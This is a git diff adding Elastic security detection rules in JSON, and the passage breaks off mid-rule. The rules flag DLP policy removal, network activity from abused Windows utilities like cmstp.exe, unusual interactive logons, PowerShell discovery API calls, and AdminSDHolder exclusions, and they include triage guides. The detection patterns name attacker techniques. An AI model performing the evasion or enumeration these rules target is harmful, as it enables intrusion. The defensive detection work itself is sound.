b/packages/security_detection_engine/kibana/security_rule/60f3adec-1df9-4104-9c75-b97d9f078b25_206.json new file mode 100644 index 00000000000..4ffa8af141c --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/60f3adec-1df9-4104-9c75-b97d9f078b25_206.json @@ -0,0 +1,90 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies when a Data Loss Prevention (DLP) policy is removed in Microsoft 365. An adversary may remove a DLP policy to evade existing DLP monitoring.", + "false_positives": [ + "A DLP policy may be removed by a system or network administrator. Verify that the configuration change was expected. Exceptions can be added to this rule to filter expected behavior." + ], + "from": "now-30m", + "index": [ + "filebeat-*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Microsoft 365 Exchange DLP Policy Removed", + "note": "", + "query": "event.dataset:o365.audit and event.provider:Exchange and event.category:web and event.action:\"Remove-DlpPolicy\" and event.outcome:success\n", + "references": [ + "https://docs.microsoft.com/en-us/powershell/module/exchange/remove-dlppolicy?view=exchange-ps", + "https://docs.microsoft.com/en-us/microsoft-365/compliance/data-loss-prevention-policies?view=o365-worldwide" + ], + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "60f3adec-1df9-4104-9c75-b97d9f078b25", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Data Source: Microsoft 365", + "Use Case: Configuration Audit", + "Tactic: Defense Evasion" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 206 + }, + "id": "60f3adec-1df9-4104-9c75-b97d9f078b25_206", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/610949a1-312f-4e04-bb55-3a79b8c95267_107.json b/packages/security_detection_engine/kibana/security_rule/610949a1-312f-4e04-bb55-3a79b8c95267_107.json new file mode 100644 index 00000000000..4281e5c7e10 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/610949a1-312f-4e04-bb55-3a79b8c95267_107.json @@ -0,0 +1,84 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies network activity from unexpected system applications. This may indicate adversarial activity as these applications are often leveraged by adversaries to execute code and evade detection.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.sysmon_operational-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Unusual Process Network Connection", + "note": "## Triage and analysis\n\n### Investigating Unusual Process Network Connection\n\nThis rule identifies network activity from unexpected system utilities and applications. These applications are commonly abused by attackers to execute code, evade detections, and bypass security protections.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate the target host that the process is communicating with.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Review the privileges assigned to the user to ensure that the least privilege principle is being followed.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "sequence by process.entity_id\n [process where host.os.type == \"windows\" and (process.name : \"Microsoft.Workflow.Compiler.exe\" or\n process.name : \"bginfo.exe\" or\n process.name : \"cdb.exe\" or\n process.name : \"cmstp.exe\" or\n process.name : \"csi.exe\" or\n process.name : \"dnx.exe\" or\n process.name : \"fsi.exe\" or\n process.name : \"ieexec.exe\" or\n process.name : \"iexpress.exe\" or\n process.name : \"odbcconf.exe\" or\n process.name : \"rcsi.exe\" or\n process.name : \"xwizard.exe\") and\n event.type == \"start\"]\n [network where host.os.type == \"windows\" and (process.name : \"Microsoft.Workflow.Compiler.exe\" or\n process.name : \"bginfo.exe\" or\n process.name : \"cdb.exe\" or\n process.name : \"cmstp.exe\" or\n process.name : \"csi.exe\" or\n process.name : \"dnx.exe\" or\n process.name : \"fsi.exe\" or\n process.name : \"ieexec.exe\" or\n process.name : \"iexpress.exe\" or\n process.name : \"odbcconf.exe\" or\n process.name : \"rcsi.exe\" or\n process.name : \"xwizard.exe\")]\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "610949a1-312f-4e04-bb55-3a79b8c95267", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Resources: Investigation Guide", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1127", + "name": "Trusted Developer Utilities Proxy Execution", + "reference": "https://attack.mitre.org/techniques/T1127/" + } + ] + } + ], + "type": "eql", + "version": 107 + }, + "id": "610949a1-312f-4e04-bb55-3a79b8c95267_107", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/61766ef9-48a5-4247-ad74-3349de7eb2ad_2.json b/packages/security_detection_engine/kibana/security_rule/61766ef9-48a5-4247-ad74-3349de7eb2ad_2.json new file mode 100644 index 00000000000..da9caf4cb1e --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/61766ef9-48a5-4247-ad74-3349de7eb2ad_2.json @@ -0,0 +1,107 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies interactive logon attempt with alternate credentials and by an unusual process. Adversaries may create a new token to escalate privileges and bypass access controls.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-system.*", + "logs-windows.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Interactive Logon by an Unusual Process", + "query": "authentication where \n host.os.type : \"windows\" and winlog.event_data.LogonProcessName : \"Advapi*\" and \n winlog.logon.type == \"Interactive\" and winlog.event_data.SubjectUserSid : (\"S-1-5-21*\", \"S-1-12-*\") and \n winlog.event_data.TargetUserSid : (\"S-1-5-21*\", \"S-1-12-*\") and process.executable : \"C:\\\\*\" and \n not startswith~(winlog.event_data.SubjectUserSid, winlog.event_data.TargetUserSid) and \n not process.executable : \n (\"?:\\\\Windows\\\\System32\\\\winlogon.exe\", \n \"?:\\\\Windows\\\\System32\\\\wininit.exe\", \n \"?:\\\\Program Files\\\\*.exe\", \n \"?:\\\\Program Files (x86)\\\\*.exe\", \n \"?:\\\\Windows\\\\SysWOW64\\\\inetsrv\\\\w3wp.exe\", \n \"?:\\\\Windows\\\\System32\\\\inetsrv\\\\w3wp.exe\", \n \"?:\\\\Windows\\\\SysWOW64\\\\msiexec.exe\")\n", + "references": [ + "https://attack.mitre.org/techniques/T1134/002/" + ], + "related_integrations": [ + { + "package": "system", + "version": "^1.6.4" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.LogonProcessName", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.SubjectUserSid", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.TargetUserSid", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.logon.type", + "type": "unknown" + } + ], + "risk_score": 73, + "rule_id": "61766ef9-48a5-4247-ad74-3349de7eb2ad", + "setup": "\nAudit event 4624 is needed to trigger this rule.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1134", + "name": "Access Token Manipulation", + "reference": "https://attack.mitre.org/techniques/T1134/", + "subtechnique": [ + { + "id": "T1134.002", + "name": "Create Process with Token", + "reference": "https://attack.mitre.org/techniques/T1134/002/" + }, + { + "id": "T1134.003", + "name": "Make and Impersonate Token", + "reference": "https://attack.mitre.org/techniques/T1134/003/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 2 + }, + "id": "61766ef9-48a5-4247-ad74-3349de7eb2ad_2", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/61766ef9-48a5-4247-ad74-3349de7eb2ad_3.json b/packages/security_detection_engine/kibana/security_rule/61766ef9-48a5-4247-ad74-3349de7eb2ad_3.json new file mode 100644 index 00000000000..b5551e8490e --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/61766ef9-48a5-4247-ad74-3349de7eb2ad_3.json @@ -0,0 +1,107 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies interactive logon attempt with alternate credentials and by an unusual process. Adversaries may create a new token to escalate privileges and bypass access controls.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-system.*", + "logs-windows.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Interactive Logon by an Unusual Process", + "query": "authentication where \n host.os.type : \"windows\" and winlog.event_data.LogonProcessName : \"Advapi*\" and \n winlog.logon.type == \"Interactive\" and winlog.event_data.SubjectUserSid : (\"S-1-5-21*\", \"S-1-12-*\") and \n winlog.event_data.TargetUserSid : (\"S-1-5-21*\", \"S-1-12-*\") and process.executable : \"C:\\\\*\" and \n not startswith~(winlog.event_data.SubjectUserSid, winlog.event_data.TargetUserSid) and \n not process.executable : \n (\"?:\\\\Windows\\\\System32\\\\winlogon.exe\", \n \"?:\\\\Windows\\\\System32\\\\wininit.exe\", \n \"?:\\\\Program Files\\\\*.exe\", \n \"?:\\\\Program Files (x86)\\\\*.exe\", \n \"?:\\\\Windows\\\\SysWOW64\\\\inetsrv\\\\w3wp.exe\", \n \"?:\\\\Windows\\\\System32\\\\inetsrv\\\\w3wp.exe\", \n \"?:\\\\Windows\\\\SysWOW64\\\\msiexec.exe\")\n", + "references": [ + "https://attack.mitre.org/techniques/T1134/002/" + ], + "related_integrations": [ + { + "package": "system", + "version": "^1.6.4" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.LogonProcessName", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.SubjectUserSid", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.TargetUserSid", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.logon.type", + "type": "unknown" + } + ], + "risk_score": 73, + "rule_id": "61766ef9-48a5-4247-ad74-3349de7eb2ad", + "setup": "## Setup\n\nAudit event 4624 is needed to trigger this rule.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1134", + "name": "Access Token Manipulation", + "reference": "https://attack.mitre.org/techniques/T1134/", + "subtechnique": [ + { + "id": "T1134.002", + "name": "Create Process with Token", + "reference": "https://attack.mitre.org/techniques/T1134/002/" + }, + { + "id": "T1134.003", + "name": "Make and Impersonate Token", + "reference": "https://attack.mitre.org/techniques/T1134/003/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 3 + }, + "id": "61766ef9-48a5-4247-ad74-3349de7eb2ad_3", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/61ac3638-40a3-44b2-855a-985636ca985e_113.json b/packages/security_detection_engine/kibana/security_rule/61ac3638-40a3-44b2-855a-985636ca985e_113.json new file mode 100644 index 00000000000..49957d049c6 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/61ac3638-40a3-44b2-855a-985636ca985e_113.json @@ -0,0 +1,160 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule detects the use of discovery-related Windows API functions in PowerShell Scripts. Attackers can use these functions to perform various situational awareness related activities, like enumerating users, shares, sessions, domain trusts, groups, etc.", + "false_positives": [ + "Legitimate PowerShell scripts that make use of these functions." + ], + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-windows.powershell*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "PowerShell Suspicious Discovery Related Windows API Functions", + "note": "## Triage and analysis\n\n### Investigating PowerShell Suspicious Discovery Related Windows API Functions\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nAttackers can use PowerShell to interact with the Win32 API to bypass command line based detections, using libraries like PSReflect or Get-ProcAddress Cmdlet.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine file or network events from the involved PowerShell process for suspicious behavior.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Check for additional PowerShell and command-line logs that indicate that imported functions were run.\n\n### False positive analysis\n\n- Discovery activities themselves are not inherently malicious if occurring in isolation, as long as the script does not contain other capabilities, and there are no other alerts related to the user or host; such alerts can be dismissed. However, analysts should keep in mind that this is not a common way of getting information, making it suspicious.\n\n### Related rules\n\n- PowerShell PSReflect Script - 56f2e9b5-4803-4e44-a0a4-a52dc79d57fe\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "event.category:process and host.os.type:windows and\n powershell.file.script_block_text : (\n NetShareEnum or\n NetWkstaUserEnum or\n NetSessionEnum or\n NetLocalGroupEnum or\n NetLocalGroupGetMembers or\n DsGetSiteName or\n DsEnumerateDomainTrusts or\n WTSEnumerateSessionsEx or\n WTSQuerySessionInformation or\n LsaGetLogonSessionData or\n QueryServiceObjectSecurity or\n GetComputerNameEx or\n NetWkstaGetInfo or\n GetUserNameEx or\n NetUserEnum or\n NetUserGetInfo or\n NetGroupEnum or\n NetGroupGetInfo or\n NetGroupGetUsers or\n NetWkstaTransportEnum or\n NetServerGetInfo or\n LsaEnumerateTrustedDomains or\n NetScheduleJobEnum or\n NetUserModalsGet\n )\n and not file.path : ?\\:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Windows?Defender?Advanced?Threat?Protection\\\\\\\\DataCollection\\\\\\\\*\n", + "references": [ + "https://github.com/BC-SECURITY/Empire/blob/9259e5106986847d2bb770c4289c0c0f1adf2344/data/module_source/situational_awareness/network/powerview.ps1#L21413", + "https://github.com/atc-project/atc-data/blob/master/docs/Logging_Policies/LP_0109_windows_powershell_script_block_log.md" + ], + "related_integrations": [ + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "powershell.file.script_block_text", + "type": "unknown" + } + ], + "risk_score": 47, + "rule_id": "61ac3638-40a3-44b2-855a-985636ca985e", + "setup": "## Setup\n\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Tactic: Collection", + "Tactic: Execution", + "Resources: Investigation Guide", + "Data Source: PowerShell Logs" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0007", + "name": "Discovery", + "reference": "https://attack.mitre.org/tactics/TA0007/" + }, + "technique": [ + { + "id": "T1069", + "name": "Permission Groups Discovery", + "reference": "https://attack.mitre.org/techniques/T1069/", + "subtechnique": [ + { + "id": "T1069.001", + "name": "Local Groups", + "reference": "https://attack.mitre.org/techniques/T1069/001/" + } + ] + }, + { + "id": "T1087", + "name": "Account Discovery", + "reference": "https://attack.mitre.org/techniques/T1087/", + "subtechnique": [ + { + "id": "T1087.001", + "name": "Local Account", + "reference": "https://attack.mitre.org/techniques/T1087/001/" + } + ] + }, + { + "id": "T1482", + "name": "Domain Trust Discovery", + "reference": "https://attack.mitre.org/techniques/T1482/" + }, + { + "id": "T1135", + "name": "Network Share Discovery", + "reference": "https://attack.mitre.org/techniques/T1135/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + } + ] + }, + { + "id": "T1106", + "name": "Native API", + "reference": "https://attack.mitre.org/techniques/T1106/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0009", + "name": "Collection", + "reference": "https://attack.mitre.org/tactics/TA0009/" + }, + "technique": [ + { + "id": "T1039", + "name": "Data from Network Shared Drive", + "reference": "https://attack.mitre.org/techniques/T1039/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 113 + }, + "id": "61ac3638-40a3-44b2-855a-985636ca985e_113", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/61ac3638-40a3-44b2-855a-985636ca985e_213.json b/packages/security_detection_engine/kibana/security_rule/61ac3638-40a3-44b2-855a-985636ca985e_213.json new file mode 100644 index 00000000000..310f2bcbb14 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/61ac3638-40a3-44b2-855a-985636ca985e_213.json @@ -0,0 +1,170 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule detects the use of discovery-related Windows API functions in PowerShell Scripts. Attackers can use these functions to perform various situational awareness related activities, like enumerating users, shares, sessions, domain trusts, groups, etc.", + "false_positives": [ + "Legitimate PowerShell scripts that make use of these functions." + ], + "filters": [ + { + "meta": { + "negate": true + }, + "query": { + "wildcard": { + "file.path": { + "case_insensitive": true, + "value": "?:\\\\ProgramData\\\\Microsoft\\\\Windows Defender Advanced Threat Protection\\\\DataCollection\\\\*" + } + } + } + } + ], + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-windows.powershell*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "PowerShell Suspicious Discovery Related Windows API Functions", + "note": "## Triage and analysis\n\n### Investigating PowerShell Suspicious Discovery Related Windows API Functions\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nAttackers can use PowerShell to interact with the Win32 API to bypass command line based detections, using libraries like PSReflect or Get-ProcAddress Cmdlet.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine file or network events from the involved PowerShell process for suspicious behavior.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Check for additional PowerShell and command-line logs that indicate that imported functions were run.\n\n### False positive analysis\n\n- Discovery activities themselves are not inherently malicious if occurring in isolation, as long as the script does not contain other capabilities, and there are no other alerts related to the user or host; such alerts can be dismissed. However, analysts should keep in mind that this is not a common way of getting information, making it suspicious.\n\n### Related rules\n\n- PowerShell PSReflect Script - 56f2e9b5-4803-4e44-a0a4-a52dc79d57fe\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "event.category:process and host.os.type:windows and\n powershell.file.script_block_text : (\n NetShareEnum or\n NetWkstaUserEnum or\n NetSessionEnum or\n NetLocalGroupEnum or\n NetLocalGroupGetMembers or\n DsGetSiteName or\n DsEnumerateDomainTrusts or\n WTSEnumerateSessionsEx or\n WTSQuerySessionInformation or\n LsaGetLogonSessionData or\n QueryServiceObjectSecurity or\n GetComputerNameEx or\n NetWkstaGetInfo or\n GetUserNameEx or\n NetUserEnum or\n NetUserGetInfo or\n NetGroupEnum or\n NetGroupGetInfo or\n NetGroupGetUsers or\n NetWkstaTransportEnum or\n NetServerGetInfo or\n LsaEnumerateTrustedDomains or\n NetScheduleJobEnum or\n NetUserModalsGet\n )\n", + "references": [ + "https://github.com/BC-SECURITY/Empire/blob/9259e5106986847d2bb770c4289c0c0f1adf2344/data/module_source/situational_awareness/network/powerview.ps1#L21413", + "https://github.com/atc-project/atc-data/blob/master/docs/Logging_Policies/LP_0109_windows_powershell_script_block_log.md" + ], + "related_integrations": [ + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "powershell.file.script_block_text", + "type": "unknown" + } + ], + "risk_score": 47, + "rule_id": "61ac3638-40a3-44b2-855a-985636ca985e", + "setup": "## Setup\n\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Tactic: Collection", + "Tactic: Execution", + "Resources: Investigation Guide", + "Data Source: PowerShell Logs" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0007", + "name": "Discovery", + "reference": "https://attack.mitre.org/tactics/TA0007/" + }, + "technique": [ + { + "id": "T1069", + "name": "Permission Groups Discovery", + "reference": "https://attack.mitre.org/techniques/T1069/", + "subtechnique": [ + { + "id": "T1069.001", + "name": "Local Groups", + "reference": "https://attack.mitre.org/techniques/T1069/001/" + } + ] + }, + { + "id": "T1087", + "name": "Account Discovery", + "reference": "https://attack.mitre.org/techniques/T1087/", + "subtechnique": [ + { + "id": "T1087.001", + "name": "Local Account", + "reference": "https://attack.mitre.org/techniques/T1087/001/" + } + ] + }, + { + "id": "T1482", + "name": "Domain Trust Discovery", + "reference": "https://attack.mitre.org/techniques/T1482/" + }, + { + "id": "T1135", + "name": "Network Share Discovery", + "reference": "https://attack.mitre.org/techniques/T1135/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + } + ] + }, + { + "id": "T1106", + "name": "Native API", + "reference": "https://attack.mitre.org/techniques/T1106/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0009", + "name": "Collection", + "reference": "https://attack.mitre.org/tactics/TA0009/" + }, + "technique": [ + { + "id": "T1039", + "name": "Data from Network Shared Drive", + "reference": "https://attack.mitre.org/techniques/T1039/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 213 + }, + "id": "61ac3638-40a3-44b2-855a-985636ca985e_213", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/61d29caf-6c15-4d1e-9ccb-7ad12ccc0bc7_110.json b/packages/security_detection_engine/kibana/security_rule/61d29caf-6c15-4d1e-9ccb-7ad12ccc0bc7_110.json new file mode 100644 index 00000000000..3d8e08d7c65 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/61d29caf-6c15-4d1e-9ccb-7ad12ccc0bc7_110.json @@ -0,0 +1,102 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies a modification on the dsHeuristics attribute on the bit that holds the configuration of groups excluded from the SDProp process. The SDProp compares the permissions on protected objects with those defined on the AdminSDHolder object. If the permissions on any of the protected accounts and groups do not match, the permissions on the protected accounts and groups are reset to match those of the domain's AdminSDHolder object, meaning that groups excluded will remain unchanged. Attackers can abuse this misconfiguration to maintain long-term access to privileged accounts in these groups.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-system.*", + "logs-windows.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "AdminSDHolder SDProp Exclusion Added", + "note": "## Triage and analysis\n\n### Investigating AdminSDHolder SDProp Exclusion Added\n\nThe SDProp process compares the permissions on protected objects with those defined on the AdminSDHolder object. If the permissions on any of the protected accounts and groups do not match, it resets the permissions on the protected accounts and groups to match those defined in the domain AdminSDHolder object.\n\nThe dSHeuristics is a Unicode string attribute, in which each character in the string represents a heuristic that is used to determine the behavior of Active Directory.\n\nAdministrators can use the dSHeuristics attribute to exclude privilege groups from the SDProp process by setting the 16th bit (dwAdminSDExMask) of the string to a certain value, which represents the group(s):\n\n- For example, to exclude the Account Operators group, an administrator would modify the string, so the 16th character is set to 1 (i.e., 0000000001000001).\n\nThe usage of this exclusion can leave the accounts unprotected and facilitate the misconfiguration of privileges for the excluded groups, enabling attackers to add accounts to these groups to maintain long-term persistence with high privileges.\n\nThis rule matches changes of the dsHeuristics object where the 16th bit is set to a value other than zero.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account and system owners and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check the value assigned to the 